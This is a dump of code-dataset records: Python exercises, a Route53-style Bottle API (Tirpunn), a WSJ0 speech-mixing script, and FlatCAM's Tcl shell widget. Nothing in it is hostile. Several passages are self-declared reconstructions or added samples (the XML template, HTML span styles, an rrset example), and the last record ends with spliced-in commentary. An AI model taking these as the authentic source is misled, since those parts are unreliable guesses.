dict. Example:\nN =5\n{1: 1, 2:4, 3:9, 4:16, 5:25}'''\nz = int(input('Number: '))\nd = {}\nfor i in range(1, z + 1):\n\td[i] = i ** 2\nprint(d)\n\n'''7. INVERT Dict\nGiven a dict. Invert it (keys become values and values become keys).\n If there is more than one key for a given value, create a list. Input\n{ a: ‘1’, b: ‘2’, c: ‘2’ } Output\n{ 1: ‘a’, 2: [‘b’, ‘c’] }'''\n\nu = {}\nx = {'a':'1','b': '2', 'c': '2'}\n\nfor key,value in x.items():\n\tif value not in u:\n\t\tu[value] = [key]\n\telse:\n\t\tu[value].append(key)\nprint(u)\n\n\n'''8. 
FIBONACCI\n Write a function using recursion to find fibonacci numbers:'''\n\ndef fibo(n):\n\tif n <= 1:\n\t\treturn n\n\telse:\n\t\treturn(fibo(n-1) + fibo(n-2))\n\nnumber = int(input('Number: '))\nif number <= 0:\n\tprint('Only positive numbers')\nelse:\n\tfor i in range(number):\n\t\tprint(fibo(i))\n","sub_path":"april3.py","file_name":"april3.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"70556579","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2013 Chiradeep Vittal\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Api: The Tirpunn REST API specification, runs as a Bottle app\"\"\"\n\nfrom bottle import Bottle, debug, route, run, request, response, HTTPResponse\nimport xml.etree.ElementTree as ET\nimport ConfigParser\nimport logging\nfrom tirpunn import Tirpunn\nfrom storage import NoopStore\nfrom dnsserver import NoopDnsServer\n\napi = Bottle()\nstore = NoopStore()\ndnsserver = NoopDnsServer()\nt = Tirpunn('tirpunn.ini', store, dnsserver)\n\n\n@api.route('/hostedzone', method='POST')\ndef create_hosted_zone():\n    xml = request.body\n    hostedzone = ET.parse(xml)\n    name = hostedzone.getroot().find('Name')\n    ref = hostedzone.getroot().find('CallerReference')\n    if (name is None or ref is None):\n        raise HTTPResponse(status='400 MalformedXML')\n    domainname = name.text\n    reference = ref.text\n    comment = 'Comment for %s' % domainname\n    #TODO : get comment as well from xml\n    [zoneid, rec_count, change_info, nslist] = \\\n        t.create_zone(domainname, reference, comment)\n    respxml = zone_response(domainname, reference, comment, zoneid,\n                            rec_count, change_info, nslist)\n    response.status = '201 Created'\n    return respxml\n\n\ndef zone_response(name, ref, comment, zoneid, rec_count, change_inf, nslist):\n    # NOTE: the XML tags in this template were stripped during extraction; the Route53-style\n    # markup below is reconstructed from the remaining placeholders and is a best-effort guess.\n    respxml = \"\"\"<?xml version=\\"1.0\\" encoding=\\"UTF-8\\"?>\n    <CreateHostedZoneResponse xmlns=\\"https://route53.amazonaws.com/doc/2012-02-29/\\">\n    <HostedZone>\n    <Id>{id}</Id>\n    <Name>{name}</Name>\n    <CallerReference>{ref}</CallerReference>\n    <Config>\n    <Comment>{comment}</Comment>\n    </Config>\n    <ResourceRecordSetCount>{reccount}</ResourceRecordSetCount>\n    </HostedZone>\n    <ChangeInfo>\n    <Id>{changeid}</Id>\n    <Status>{status}</Status>\n    <SubmittedAt>{submitdate}</SubmittedAt>\n    </ChangeInfo>\n    <DelegationSet>\n    <NameServers>\n    <NameServer>{ns1}</NameServer>\n    <NameServer>{ns2}</NameServer>\n    <NameServer>{ns3}</NameServer>\n    <NameServer>{ns4}</NameServer>\n    </NameServers>\n    </DelegationSet>\n    </CreateHostedZoneResponse>\n    \"\"\"\n    return respxml.format(\n        id=zoneid, name=name, ref=ref, comment=comment,\n        reccount=rec_count, changeid=change_inf['id'],\n        status=change_inf['status'], submitdate=change_inf['date'],\n        ns1=nslist[0], ns2=nslist[1], ns3=nslist[2], ns4=nslist[3])\n\n\n@api.route('/hostedzone/:zone', method='GET')\ndef list_hosted_ns_for_zone(zone='Invalid'):\n    logging.info(\"GET hosted zone zone=%s\", (zone))\n    return zone\n\n\n@api.route('/hostedzone', method='GET')\ndef list_hosted_zones_for_account():\n    #need case insensitivity though\n    maxItems = request.query.get('maxItems')\n    logging.info(\"GET hosted zone maxItems=%s\", (maxItems))\n\n\n@api.route('/hostedzone/:zone', method='DELETE')\ndef deleted_hosted_zone(zone='Invalid'):\n    logging.info('Deleted zone =%s' % zone)\n\n\n@api.route('/hostedzone/:zone/rrset', method='POST')\ndef change_record_sets(zone='Invalid'):\n    logging.info('Changed record set for zone %s' % (zone))
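\n    # For illustration only (hypothetical sample, not taken from the Tirpunn sources): since\n    # Tirpunn mimics the AWS Route53 REST API, the body that a client POSTs to this rrset\n    # endpoint would look roughly like the 2012-02-29 ChangeResourceRecordSets request below.\n    # All record values here (name, type, TTL, address) are made-up examples.\n    #\n    # <ChangeResourceRecordSetsRequest xmlns=\"https://route53.amazonaws.com/doc/2012-02-29/\">\n    #   <ChangeBatch>\n    #     <Changes>\n    #       <Change>\n    #         <Action>CREATE</Action>\n    #         <ResourceRecordSet>\n    #           <Name>www.example.com.</Name>\n    #           <Type>A</Type>\n    #           <TTL>300</TTL>\n    #           <ResourceRecords>\n    #             <ResourceRecord><Value>192.0.2.1</Value></ResourceRecord>\n    #           </ResourceRecords>\n    #         </ResourceRecordSet>\n    #       </Change>\n    #     </Changes>\n    #   </ChangeBatch>\n    # </ChangeResourceRecordSetsRequest>\n    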
logging.debug(request.body.read())\n\n\n@api.route('/hostedzone/change/:changeid', method='GET')\ndef get_state_for_changeid(changeid='Invalid'):\n    logging.info('Change status for change id %s is INSYNC' % (changeid))\n\n\n@api.route('/hostedzone/:zone/rrset', method='GET')\ndef list_records_for_hostedzone(zone='Invalid'):\n    logging.info('Listing %s records for zone %s ' %\n                 (request.query.get('maxItems'), zone))\n\n\ndef main():\n    debug(True)\n    logging.basicConfig(level='DEBUG')\n    run(api, host='localhost', port=8080, reloader=True)\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"tirpunn/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"3945231","text":"import argparse\nimport csv\nimport datetime\nimport matlab.engine\nimport numpy as np\nimport os\nimport pandas as pd\nimport random\nimport soundfile as sf\n\nfrom scipy.io import savemat\nfrom scipy.signal import resample_poly\n\nS_N_DIR = 's{}'\nMIX_DIR = 'mix'\n\nN_TR = 4000 # number of training files to generate\nN_TT = 600 # number of test files to generate\nN_CV = 1000 # number of validation files to generate\n\nFILELIST_STUB = 'mix_{}_spk_filenames_{}.csv'\n\n\ndef read_wav(path, downsample_8k=False):\n    samples, sr_orig = sf.read(path)\n    if len(samples.shape) > 1:\n        samples = samples[:, 0]\n\n    if downsample_8k:\n        samples = resample_poly(samples, 8000, sr_orig)\n\n    return samples\n\n\ndef write_wav(file, samples, sr):\n    int_samples = np.int16(np.round((2 ** 15) * samples))\n    sf.write(file, int_samples, sr, subtype='PCM_16')\n\n\ndef fix_length(utterances, min_or_max='max'):\n    if min_or_max == 'min':\n        utt_len = np.min(np.array(list(map(len, utterances))))\n    else: # max\n        utt_len = np.max(np.array(list(map(len, utterances))))\n    for i in range(len(utterances)):\n        if len(utterances[i]) >= utt_len:\n            utterances[i] = utterances[i][:utt_len]\n        else:\n            utterances[i] = np.append(utterances[i], np.zeros(utt_len - len(utterances[i])))\n\n\ndef get_max_amplitude(mix, utterances):\n    audio_tracks = utterances\n    audio_tracks.append(mix)\n    max_amplitude = 0\n    for i in range(len(audio_tracks)):\n        current_max = np.max(np.abs(audio_tracks[i]))\n        if current_max > max_amplitude:\n            max_amplitude = current_max\n\n    return max_amplitude\n\n\ndef create_wsj0_mix_k_split_csv(wsj_root, csv_path, n_speakers, split, random_seed=0):\n    random.seed(random_seed)\n    np.random.seed(random_seed)\n\n    wsj0_tr_speakers_list = [os.path.basename(f.path) for f in os.scandir(os.path.join(wsj_root, 'wsj0', 'si_tr_s')) if f.is_dir()]\n    split_index = int(np.round(len(wsj0_tr_speakers_list) * (N_TR / (N_TR + N_CV))))\n\n    wsj0_speakers_tr = wsj0_tr_speakers_list[:split_index]\n    wsj0_speakers_cv = wsj0_tr_speakers_list[split_index:]\n\n    wsj0_speakers_tt_dt = [os.path.basename(f.path) for f in os.scandir(os.path.join(wsj_root, 'wsj0', 'si_dt_05')) if f.is_dir()]\n    wsj0_speakers_tt_et = [os.path.basename(f.path) for f in os.scandir(os.path.join(wsj_root, 'wsj0', 'si_et_05')) if f.is_dir()]\n\n    if split == 'tt':\n        n_mixtures = N_TT\n        wsj0_speakers = wsj0_speakers_tt_dt + wsj0_speakers_tt_et\n    elif split == 'cv':\n        n_mixtures = N_CV\n        wsj0_speakers = wsj0_speakers_cv\n    else:\n        n_mixtures = N_TR\n        wsj0_speakers = wsj0_speakers_tr\n\n    rows = []\n    for i_mix in range(n_mixtures):\n        amp_values_db = np.random.rand(n_speakers) * 10.0 - 5.0\n        if n_speakers % 2 == 0: # k even\n            amp_values_db[1] = amp_values_db[0] * -1.0\n        elif n_speakers % 2 == 1 and n_speakers 
> 1: # k odd and k > 1\n amp_values_db[0] = 0.0\n amp_values_db[2] = amp_values_db[1] * -1.0\n\n random_speakers = random.sample(wsj0_speakers, k=n_speakers)\n random_utterances = []\n for speaker in random_speakers:\n if split == 'tt' and speaker in wsj0_speakers_tt_dt:\n file_path = os.path.join(wsj_root, 'wsj0', 'si_dt_05', speaker)\n elif split == 'tt' and speaker in wsj0_speakers_tt_et:\n file_path = os.path.join(wsj_root, 'wsj0', 'si_et_05', speaker)\n else:\n file_path = os.path.join(wsj_root, 'wsj0', 'si_tr_s', speaker)\n\n files = [f.path for f in os.scandir(file_path) if f.path.endswith('.wav')]\n random_file = random.choice(files)\n path_parts = []\n for _ in range(4):\n random_file = os.path.split(random_file)\n path_parts.append(random_file[1])\n random_file = random_file[0]\n\n random_utterance = os.path.join(*path_parts[::-1])\n random_utterances.append(random_utterance)\n\n output_filename = ''\n for i, file in enumerate(random_utterances):\n output_filename += os.path.split(file)[-1][:-4]\n output_filename += '_'\n output_filename += '{:.4f}'.format(amp_values_db[i])\n output_filename += '_'\n\n output_filename = output_filename[:-1] + '.wav'\n row_entry = [output_filename] + random_utterances + amp_values_db.tolist()\n rows.append(row_entry)\n\n fields = ['output_filename']\n for i in range(n_speakers):\n fields.append('s{}_path'.format(i + 1))\n\n for i in range(n_speakers):\n fields.append('s{}_snr'.format(i + 1))\n\n csv_filename = os.path.join(csv_path, FILELIST_STUB.format(n_speakers, split))\n with open(csv_filename, mode='w', newline='') as csv_file:\n csvwriter = csv.writer(csv_file)\n csvwriter.writerow(fields)\n csvwriter.writerows(rows)\n\n print('CSV file creation finished for the data split: {}'.format(split))\n\n\ndef main(wsj0_root, output_root, n_speakers, sr_str='8k', data_length='min'):\n assert n_speakers > 0, 'The number of speakers to mix must be greater than zero'\n assert sr_str in ['8k', '16k', 'both'], 'The sample rate argument must be one of: 8k / 16k / both'\n assert data_length in ['max', 'min', 'both'], 'The data length argument must be one of: min / max / both'\n\n mlab_engine = matlab.engine.start_matlab()\n buffer_file = os.path.join(output_root, 'wsj0-mix{}'.format(n_speakers), 'helper.mat')\n\n wav_path = os.path.join(output_root, 'wsj0-mix{}'.format(n_speakers))\n csv_path = os.path.join(wav_path, 'data')\n if not os.path.exists(csv_path):\n os.makedirs(csv_path)\n\n for split in ['tr', 'cv', 'tt']:\n create_wsj0_mix_k_split_csv(wsj0_root, csv_path, n_speakers, split)\n\n if sr_str == 'both':\n sr_options = [8000, 16000]\n elif sr_str == '16k':\n sr_options = [16000]\n else:\n sr_options = [8000]\n\n for sr in sr_options:\n wav_dir = 'wav' + '{}k'.format(int(sr / 1000))\n if sr == 8000:\n downsample = True\n else:\n downsample = False\n\n if data_length == 'both':\n datalen_options = ['max', 'min']\n elif data_length == 'max':\n datalen_options = ['max']\n else:\n datalen_options = ['min']\n\n for datalen in datalen_options:\n for split in ['tr', 'cv', 'tt']:\n output_path = os.path.join(wav_path, wav_dir, datalen, split)\n\n for i in range(n_speakers):\n speaker_i_output_dir = os.path.join(output_path, S_N_DIR.format(i + 1))\n os.makedirs(speaker_i_output_dir, exist_ok=True)\n\n mix_output_dir = os.path.join(output_path, MIX_DIR)\n os.makedirs(mix_output_dir, exist_ok=True)\n\n print('{} {} dataset, {} split'.format(wav_dir, datalen, split))\n\n # read filenames\n wsjmix_path = os.path.join(csv_path, FILELIST_STUB.format(n_speakers, 
split))\n wsjmix_df = pd.read_csv(wsjmix_path)\n\n for i_utt, csv_tuple in enumerate(wsjmix_df.itertuples(index=False, name=None)):\n scalings = []\n utterances = []\n for i in range(n_speakers):\n s_i = read_wav(os.path.join(wsj0_root, csv_tuple[i + 1]), downsample)\n\n # hack to significantly increase the performance of passing python arrays to the matlab engine\n savemat(buffer_file, dict(s_i=s_i))\n\n # active speech level computation in units of power\n level_i = mlab_engine.activlev(mlab_engine.load(buffer_file)['s_i'], mlab_engine.double(sr), 'n', nargout=2)[1]\n scaling_i = 1 / np.sqrt(level_i) # active speech level normalization to 0 dB\n\n # application of the target SNR (converted from dB to linear scale)\n scaling_i *= 10 ** (csv_tuple[i + n_speakers + 1] / 20)\n s_i *= scaling_i\n scalings.append(scaling_i)\n utterances.append(s_i)\n\n fix_length(utterances, datalen)\n mix = np.sum(np.array(utterances), axis=0)\n\n output_name = csv_tuple[0]\n max_amplitude = get_max_amplitude(mix, utterances)\n max_peak_norm = 0.9 * (1 / max_amplitude) # maximum peak normalization factor\n for i in range(n_speakers):\n speaker_i_output_dir = os.path.join(output_path, S_N_DIR.format(i + 1))\n write_wav(os.path.join(speaker_i_output_dir, output_name), utterances[i] * max_peak_norm, sr)\n\n write_wav(os.path.join(mix_output_dir, output_name), mix * max_peak_norm, sr)\n\n if (i_utt + 1) % 100 == 0:\n print('Completed {} of {} utterances -- {}'.format(i_utt + 1, len(wsjmix_df), str(datetime.datetime.now())))\n\n # remove the matlab helper file when finished\n if os.path.exists(buffer_file):\n os.remove(buffer_file)\n\n mlab_engine.quit()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--output-dir', type=str, help='Output directory for writing WSJ0-mix-k 8 kHz and 16 kHz datasets')\n parser.add_argument('--wsj0-root', type=str, help='Path to the folder containing wsj0/')\n parser.add_argument('--sr-str', type=str, help='The target sample rate of the created wav files. Choose one: 8k / 16k / both')\n parser.add_argument('--data-length', type=str,\n help='Whether to use the maximum or minimum length of the selected utterances. Choose one: min / max / both')\n parser.add_argument('--k', type=int, help='Number of speakers to mix in each mixture')\n args = parser.parse_args()\n main(args.wsj0_root, args.output_dir, args.k, args.sr_str, args.data_length)\n","sub_path":"src/create_wsj0_mix_k_subset.py","file_name":"create_wsj0_mix_k_subset.py","file_ext":"py","file_size_in_byte":10063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"153130202","text":"# ##########################################################\n# FlatCAM: 2D Post-processing for Manufacturing #\n# http://flatcam.org #\n# Author: Juan Pablo Caram (c) #\n# Date: 2/5/2014 #\n# MIT Licence #\n# ##########################################################\n\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QTextCursor, QPixmap\nfrom PyQt5.QtWidgets import QVBoxLayout, QWidget, QHBoxLayout, QLabel\nfrom appGUI.GUIElements import _BrowserTextEdit, _ExpandableTextEdit, FCLabel\nimport html\nimport sys\nimport traceback\n\nimport tkinter as tk\nimport tclCommands\n\nimport gettext\nimport appTranslation as fcTranslate\nimport builtins\n\nfcTranslate.apply_language('strings')\nif '_' not in builtins.__dict__:\n _ = gettext.gettext\n\n\nclass TermWidget(QWidget):\n \"\"\"\n Widget which represents terminal. 
It only displays text and allows to enter text.\n All high level logic should be implemented by client classes\n\n User pressed Enter. Client class should decide, if command must be executed or user may continue edit it\n \"\"\"\n\n def __init__(self, version, app, *args):\n QWidget.__init__(self, *args)\n\n self.app = app\n\n self._browser = _BrowserTextEdit(version=version, app=app)\n self._browser.setStyleSheet(\"font: 9pt \\\"Courier\\\";\")\n self._browser.setReadOnly(True)\n self._browser.document().setDefaultStyleSheet(\n self._browser.document().defaultStyleSheet() +\n \"span {white-space:pre;}\")\n\n self._edit = _ExpandableTextEdit(self, self)\n self._edit.historyNext.connect(self._on_history_next)\n self._edit.historyPrev.connect(self._on_history_prev)\n self._edit.setFocus()\n self.setFocusProxy(self._edit)\n\n self._delete_line = FCLabel()\n self._delete_line.setPixmap(QPixmap(self.app.resource_location + '/clear_line16.png'))\n self._delete_line.setMargin(3)\n self._delete_line.setToolTip(_(\"Clear the text.\"))\n\n layout = QVBoxLayout(self)\n layout.setSpacing(0)\n layout.setContentsMargins(0, 0, 0, 0)\n layout.addWidget(self._browser)\n\n hlay = QHBoxLayout()\n hlay.addWidget(self._delete_line)\n hlay.addWidget(QLabel(\" \"))\n hlay.addWidget(self._edit)\n layout.addLayout(hlay)\n\n self._history = [''] # current empty line\n self._historyIndex = 0\n\n self._delete_line.clicked.connect(self.on_delete_line_clicked)\n\n def command_line(self):\n return self._edit\n\n def on_delete_line_clicked(self):\n self._edit.clear()\n\n def open_processing(self, detail=None):\n \"\"\"\n Open processing and disable using shell commands again until all commands are finished\n\n :param detail: text detail about what is currently called from TCL to python\n :return: None\n \"\"\"\n\n self._edit.setTextColor(Qt.white)\n self._edit.setTextBackgroundColor(Qt.darkGreen)\n if detail is None:\n self._edit.setPlainText(_(\"...processing...\"))\n else:\n self._edit.setPlainText('%s [%s]' % (_(\"...processing...\"), detail))\n\n self._edit.setDisabled(True)\n self._edit.setFocus()\n\n def close_processing(self):\n \"\"\"\n Close processing and enable using shell commands again\n :return:\n \"\"\"\n\n self._edit.setTextColor(Qt.black)\n self._edit.setTextBackgroundColor(Qt.white)\n self._edit.setPlainText('')\n self._edit.setDisabled(False)\n self._edit.setFocus()\n\n def _append_to_browser(self, style, text):\n \"\"\"\n Convert text to HTML for inserting it to browser\n \"\"\"\n assert style in ('in', 'out', 'err', 'warning', 'success', 'selected', 'raw')\n\n if style != 'raw':\n text = html.escape(text)\n text = text.replace('\\n', '
<br>')\n        else:\n            text = text.replace('\n', '<br>')\n        text = text.replace('\t', '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;')\n\n        idx = text.find(']')\n        mtype = text[:idx+1].upper()\n        mtype = mtype.replace('_NOTCL', '')\n        body = text[idx+1:]\n        # NOTE: the <span> markup below was stripped during extraction and is reconstructed here;\n        # the styles/colors are representative placeholders, not verified against the original sources.\n        if style.lower() == 'in':\n            text = '<span style=\"font-weight: bold;\">%s</span>' % text\n        elif style.lower() == 'err':\n            text = '<span style=\"font-weight: bold; background-color: red;\">%s</span>'\\\n                   '<span style=\"font-weight: bold;\">%s</span>'\\\n                   % (mtype, body)\n        elif style.lower() == 'warning':\n            # text = '<span style=\"color: orange;\">%s</span>' % text\n            text = '<span style=\"font-weight: bold; color: orange;\">%s</span>' \\\n                   '<span style=\"font-weight: bold;\">%s</span>' \\\n                   % (mtype, body)\n        elif style.lower() == 'success':\n            # text = '<span style=\"color: green;\">%s</span>' % text\n            text = '<span style=\"font-weight: bold; color: green;\">%s</span>' \\\n                   '<span style=\"font-weight: bold;\">%s</span>' \\\n                   % (mtype, body)\n        elif style.lower() == 'selected':\n            text = ''\n        elif style.lower() == 'raw':\n            text = text\n        else:\n            # without span <br> is ignored!!!\n            text = '<span>%s</span>' % text\n\n        scrollbar = self._browser.verticalScrollBar()\n        old_value = scrollbar.value()\n        # scrollattheend = old_value == scrollbar.maximum()\n\n        self._browser.moveCursor(QTextCursor.End)\n        self._browser.insertHtml(text)\n\n        \"\"\"TODO When the user enters a second line in the input and the input is resized, the scrollbar changes its position\n        and stops moving. As a quick fix for this problem, we now always scroll down when adding new text.\n        To fix it correctly, scroll to the bottom only if the scrollbar was at the bottom before the input was resized,\n        and remove the next line\n        \"\"\"\n        scrollattheend = True\n\n        if scrollattheend:\n            scrollbar.setValue(scrollbar.maximum())\n        else:\n            scrollbar.setValue(old_value)\n\n    def exec_current_command(self):\n        \"\"\"\n        Save the current command in the history. Append it to the log. Clear the edit line.\n        Re-implement in the child classes to actually execute the command.\n        \"\"\"\n        text = str(self._edit.toPlainText())\n\n        # on Windows replace all backslash symbols '\\\\' with '\\\\\\\\' because Windows paths are made with backslashes\n        # and in Python a single backslash is the escape symbol\n        if sys.platform == 'win32':\n            text = text.replace('\\\\', '\\\\\\\\')\n\n        self._append_to_browser('in', '> ' + text + '\\n')\n\n        if len(self._history) < 2 or self._history[-2] != text: # don't insert duplicating items\n            try:\n                if text[-1] == '\\n':\n                    self._history.insert(-1, text[:-1])\n                else:\n                    self._history.insert(-1, text)\n            except IndexError:\n                return\n\n        self._historyIndex = len(self._history) - 1\n\n        self._history[-1] = ''\n        self._edit.clear()\n\n        if not text[-1] == '\\n':\n            text += '\\n'\n\n        self.child_exec_command(text)\n\n    def child_exec_command(self, text):\n        \"\"\"\n        Re-implement in the child classes\n        \"\"\"\n        pass\n\n    def add_line_break_to_input(self):\n        self._edit.textCursor().insertText('\\n')\n\n    def append_output(self, text):\n        \"\"\"\n        Append text to output widget\n        \"\"\"\n        self._append_to_browser('out', text)\n\n    def append_raw(self, text):\n        \"\"\"\n        Append text to output widget as it is\n        \"\"\"\n        self._append_to_browser('raw', text)\n\n    def append_success(self, text):\n        \"\"\"Append text to output widget\n        \"\"\"\n        self._append_to_browser('success', text)\n\n    def append_selected(self, text):\n        \"\"\"Append text to output widget\n        \"\"\"\n        self._append_to_browser('selected', text)\n\n    def append_warning(self, text):\n        \"\"\"Append text to output widget\n        \"\"\"\n        self._append_to_browser('warning', text)\n\n    def append_error(self, text):\n        \"\"\"Append error text to output widget. Text is drawn with red background\n        \"\"\"\n        self._append_to_browser('err', text)\n\n    def is_command_complete(self, text):\n        \"\"\"\n        Executed by _ExpandableTextEdit. 
Re-implement this function in the child classes.\n \"\"\"\n return True\n\n def browser(self):\n return self._browser\n\n def _on_history_next(self):\n \"\"\"\n Down pressed, show next item from the history\n \"\"\"\n if (self._historyIndex + 1) < len(self._history):\n self._historyIndex += 1\n self._edit.setPlainText(self._history[self._historyIndex])\n self._edit.moveCursor(QTextCursor.End)\n\n def _on_history_prev(self):\n \"\"\"\n Up pressed, show previous item from the history\n \"\"\"\n if self._historyIndex > 0:\n if self._historyIndex == (len(self._history) - 1):\n self._history[-1] = self._edit.toPlainText()\n self._historyIndex -= 1\n self._edit.setPlainText(self._history[self._historyIndex])\n self._edit.moveCursor(QTextCursor.End)\n\n\nclass FCShell(TermWidget):\n def __init__(self, app, version, *args):\n \"\"\"\n Initialize the TCL Shell. A dock widget that holds the GUI interface to the FlatCAM command line.\n\n :param app: When instantiated the sysShell will be actually the FlatCAMApp.App() class\n :param version: FlatCAM version string\n :param args: Parameters passed to the TermWidget parent class\n \"\"\"\n TermWidget.__init__(self, version, *args, app=app)\n self.app = app\n\n self.tcl_commands_storage = {}\n self.tcl = None\n\n self.init_tcl()\n\n self._edit.set_model_data(self.app.myKeywords)\n self.setWindowIcon(self.app.ui.app_icon)\n self.setWindowTitle(_(\"FlatCAM Shell\"))\n self.resize(*self.app.defaults[\"global_shell_shape\"])\n self._append_to_browser('in', \"FlatCAM %s - \" % version)\n self.append_output('%s\\n\\n' % _(\"Type >help< to get started\"))\n\n self.app.ui.shell_dock.setWidget(self)\n self.app.log.debug(\"TCL Shell has been initialized.\")\n\n def init_tcl(self):\n if hasattr(self, 'tcl') and self.tcl is not None:\n # self.tcl = None\n # new object cannot be used here as it will not remember values created for next passes,\n # because tcl was executed in old instance of TCL\n pass\n else:\n self.tcl = tk.Tcl()\n self.setup_shell()\n\n def setup_shell(self):\n \"\"\"\n Creates shell functions. 
Runs once at startup.\n\n        :return: None\n        \"\"\"\n\n        '''\n        How to implement TCL shell commands:\n\n        All parameters passed to a command should be possible to set as None and tested afterwards.\n        This is because we need to see the error caused in tcl;\n        if a None value as default parameter is not allowed, TCL will return an empty error.\n        Use:\n            def mycommand(name=None,...):\n\n        Test it like this:\n            if name is None:\n\n                self.raise_tcl_error('Argument name is missing.')\n\n        When an error occurs, always use raise_tcl_error, never return \"some text\" on error,\n        otherwise we will miss it and processing will silently continue.\n        Method raise_tcl_error passes the error into the TCL interpreter, then raises a python exception,\n        which is caught in exec_command and displayed in the TCL shell console with a red background.\n        The error in the console is displayed with the TCL trace.\n\n        This behavior works only within the main thread;\n        errors from promised tasks can be caught and detected only with the log.\n        TODO: this problem has to be addressed somehow, maybe rewrite promising to be blocking somehow for the\n        TCL shell.\n\n        Kamil's comment: I will rewrite existing TCL commands from time to time to follow these rules.\n\n        '''\n\n        # Import/overwrite tcl commands as objects of TclCommand descendants\n        # This modifies the variable 'self.tcl_commands_storage'.\n        tclCommands.register_all_commands(self.app, self.tcl_commands_storage)\n\n        # Add commands to the tcl interpreter\n        for cmd in self.tcl_commands_storage:\n            self.tcl.createcommand(cmd, self.tcl_commands_storage[cmd]['fcn'])\n\n        # Make the tcl puts function return instead of print to stdout\n        self.tcl.eval('''\n            rename puts original_puts\n            proc puts {args} {\n                if {[llength $args] == 1} {\n                    return \"[lindex $args 0]\"\n                } else {\n                    eval original_puts $args\n                }\n            }\n            ''')\n\n    def is_command_complete(self, text):\n\n        # def skipQuotes(txt):\n        #     quote = txt[0]\n        #     text_val = txt[1:]\n        #     endIndex = str(text_val).index(quote)\n        #     return text[endIndex:]\n\n        # I'm disabling this because I need to be able to load paths that have spaces by\n        # enclosing them in quotes --- Marius Stanciu\n        # while text:\n        #     if text[0] in ('\"', \"'\"):\n        #         try:\n        #             text = skipQuotes(text)\n        #         except ValueError:\n        #             return False\n        #     text = text[1:]\n\n        return True\n\n    def child_exec_command(self, text):\n        self.exec_command(text)\n\n    def exec_command(self, text, no_echo=False):\n        \"\"\"\n        Handles input from the shell. See FlatCAMApp.setup_shell for shell commands.\n        Also handles execution in separate threads.\n\n        :param text: FlatCAM TclCommand with parameters\n        :param no_echo: If True it will not try to print to the Shell because most likely the shell is hidden and it\n                        would create crashes of the _Expandable_Edit widget\n        :return: output if there was any\n        \"\"\"\n\n        self.app.defaults.report_usage('exec_command')\n\n        return self.exec_command_test(text, False, no_echo=no_echo)\n\n    def exec_command_test(self, text, reraise=True, no_echo=False):\n        \"\"\"\n        Same as exec_command(...) with additional control over exceptions.\n        Handles input from the shell. 
See FlatCAMApp.setup_shell for shell commands.\n\n :param text: Input command\n :param reraise: Re-raise TclError exceptions in Python (mostly for unittests).\n :param no_echo: If True it will not try to print to the Shell because most likely the shell is hidden and\n printing would crash the _Expandable_Edit widget\n :return: Output from the command\n \"\"\"\n\n tcl_command_string = str(text)\n\n try:\n if no_echo is False:\n self.open_processing() # Disables input box.\n\n result = self.tcl.eval(str(tcl_command_string))\n if result != 'None' and no_echo is False:\n self.append_output(result + '\\n')\n\n except tk.TclError as e:\n # This will display a more precise answer if something in the TCL shell fails\n result = self.tcl.eval(\"set errorInfo\")\n self.app.log.error(\"Exception on Tcl Command execution: %s\" % (result + '\\n'))\n if no_echo is False:\n self.append_error('ERROR Report: ' + result + '\\n')\n # Show the error in the console and just return, or re-raise the exception when testing\n if reraise:\n raise e\n finally:\n if no_echo is False:\n self.close_processing()\n pass\n return result\n\n def raise_tcl_unknown_error(self, unknownException):\n \"\"\"\n Raise a TCL error if the exception is of a different type than TclErrorException;\n this is here mainly to show unknown errors inside the TCL shell console.\n\n :param unknownException:\n :return:\n \"\"\"\n\n if not isinstance(unknownException, self.TclErrorException):\n self.raise_tcl_error(\"Unknown error: %s\" % str(unknownException))\n else:\n raise unknownException\n\n def display_tcl_error(self, error, error_info=None):\n \"\"\"\n Escape the bracket [ with '\\', otherwise the error\n \"ERROR: missing close-bracket\" is shown instead of the real error\n\n :param error: it may be text or an exception\n :param error_info: Some information about the error\n :return: None\n \"\"\"\n\n if isinstance(error, Exception):\n exc_type, exc_value, exc_traceback = error_info\n if not isinstance(error, self.TclErrorException):\n show_trace = 1\n else:\n show_trace = int(self.app.defaults['global_verbose_error_level'])\n\n if show_trace > 0:\n trc = traceback.format_list(traceback.extract_tb(exc_traceback))\n trc_formated = []\n for a in reversed(trc):\n trc_formated.append(a.replace(\" \", \" > \").replace(\"\\n\", \"\"))\n text = \"%s\\nPython traceback: %s\\n%s\" % (exc_value, exc_type, \"\\n\".join(trc_formated))\n else:\n text = \"%s\" % error\n else:\n text = error\n\n text = text.replace('[', '\\\\[').replace('\"', '\\\\\"')\n self.tcl.eval('return -code error \"%s\"' % text)\n\n def raise_tcl_error(self, text):\n \"\"\"\n This method passes an exception from Python into TCL as an error, so we get the stack trace and the reason.\n\n :param text: text of the error\n :return: raises an exception\n \"\"\"\n\n self.display_tcl_error(text)\n raise self.TclErrorException(text)\n\n class TclErrorException(Exception):\n \"\"\"\n this exception is defined here so it can be caught when we successfully handle all errors from a shell command\n \"\"\"\n pass\n\n # \"\"\"\n # Code below is unused. 
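The bracket escaping in display_tcl_error above exists because [ starts command substitution in Tcl; an unescaped [ inside the return -code error script would itself fail with "missing close-bracket" instead of reporting the real message. A small sketch of just that step, with a made-up message:

```python
# Why display_tcl_error() escapes brackets: in Tcl, [ starts command
# substitution, so a raw [ in the error text breaks the
# 'return -code error "..."' script itself. The message is a made-up example.
import tkinter as tk

tcl = tk.Tcl()
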